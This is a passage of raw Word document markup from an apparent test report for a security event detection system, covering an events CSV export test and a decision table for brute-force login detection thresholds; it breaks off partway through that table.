            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Events stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/export/events.csv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">CSV with header and all events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200; 12 columns, 1,642 event rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9045" w:name="_Toc69045"/>
      <w:r>
        <w:t xml:space="preserve">8.3 Business Rules Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9045"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decision-table testing is used to test the business rules defined in the functional requirements and use cases. Inputs (conditions) and outputs (actions) are listed in tabular form; each rule column of the final table becomes one test case (methodology of Appendix E of the SDS template).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For these tests, authentication events with controlled counts were written for dedicated test addresses and one detection pass was run (POST /api/detect); the resulting detections and alerts were read back from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9046" w:name="_Toc69046"/>
      <w:r>
        <w:t xml:space="preserve">Brute-Force Detection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9046"/>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An IP with 5 or more failed logins on one protocol within 10 minutes is flagged as BRUTE_FORCE (MEDIUM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">20 or more failures raise the severity to HIGH; 50 or more raise it to CRITICAL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Within the same time bucket the same attack updates the existing detection (severity can only rise); no duplicate row is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decision table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">22</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Decision Table for Brute-Force Detection</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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000"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="1000"/>
        <w:tblGridChange w:id="72">
          <w:tblGrid>
            <w:gridCol w:w="3000"/>
            <w:gridCol w:w="1000"/>
            <w:gridCol w:w="1000"/>
            <w:gridCol w:w="1000"/>
            <w:gridCol w:w="1000"/>
            <w:gridCol w:w="1000"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="575438B5" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="092ADA2E" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Failed logins from IP in 10 min ≥ 5?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="092ADA2E" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Failed logins ≥ 20?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
